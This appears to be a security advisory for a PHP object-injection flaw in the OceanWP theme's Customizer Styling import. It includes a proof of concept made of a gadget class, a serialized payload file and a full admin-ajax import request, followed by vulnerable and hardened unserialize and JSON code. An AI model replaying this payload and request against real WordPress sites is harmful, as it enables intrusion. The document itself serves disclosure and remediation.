The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a high-privilege user imports (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.
Proof of Concept

1. To simulate a gadget chain, put the following code in a plugin:

```php
class Evil { public function __wakeup() : void { die("Arbitrary deserialization"); } }
```

2. Create a file named import.dat with the following content:

```
O:4:"Evil":0:{};
```

3. Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active).

4. Then view the response of the import request made, which will contain the "Arbitrary deserialization" message.

```http
POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]

-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream

O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"

oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"

166c9022e0
-----------------------------371888087213614698033751989022--
```
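The root cause above is a bare unserialize() call on file content the user uploads. The following PHP is an added illustration, not code from the plugin or the advisory: it places that vulnerable pattern beside two hardened versions (PHP 7.0+ unserialize() with allowed_classes disabled, and a JSON-based export/import that cannot carry objects at all). The function names, the sample payload and the sample settings array are all constructed for this example.

```php
<?php
// Added example (hypothetical function names, not OceanWP code).

// Stand-in for a gadget class that happens to exist on the blog: any class with a
// magic method (__wakeup, __destruct, ...) that does something when instantiated.
class Evil {
    public function __wakeup(): void { echo "Arbitrary deserialization\n"; }
}

// Constructed sample upload, same shape as the advisory's import.dat.
$upload = 'O:4:"Evil":0:{}';

// VULNERABLE: whatever class name the file contains gets instantiated, and its
// magic methods run before the plugin ever inspects the result.
function import_vulnerable(string $data) {
    return unserialize($data);
}

// HARDENED 1: keep the serialize() format but forbid class instantiation.
// Any object in the payload becomes a __PHP_Incomplete_Class instance whose
// magic methods never run; a type check then rejects it outright.
function import_hardened(string $data): ?array {
    $settings = @unserialize($data, ['allowed_classes' => false]);
    if (!is_array($settings)) {
        return null; // a legitimate export is an array of option values; anything else is rejected
    }
    return $settings;
}

// HARDENED 2: avoid unserialize() for export/import entirely. JSON can express
// arrays and scalars but no objects with behaviour.
function export_settings(array $settings): string {
    return json_encode($settings, JSON_THROW_ON_ERROR);
}

function import_json(string $data): ?array {
    $settings = json_decode($data, true);
    return is_array($settings) ? $settings : null;
}

// import_vulnerable($upload) would print "Arbitrary deserialization".
var_dump(import_hardened($upload));                 // NULL: incomplete-class object, not an array
$exported = export_settings(['ocean_header_style' => 'minimal']); // constructed sample setting
var_dump(import_json($exported));                    // array(1) { ["ocean_header_style"]=> "minimal" }
var_dump(import_json($upload));                      // NULL: not valid JSON
```

Of the two, the JSON route is the one to prefer for new code: it removes the unserialize() sink rather than constraining it, and an existing serialized export can be migrated by reading it once with allowed_classes disabled and re-writing it as JSON. Either way the import handler should still require the manage_options capability and a valid nonce, as the admin-ajax request above does; those checks limit who can reach the sink but, on their own, do not remove it.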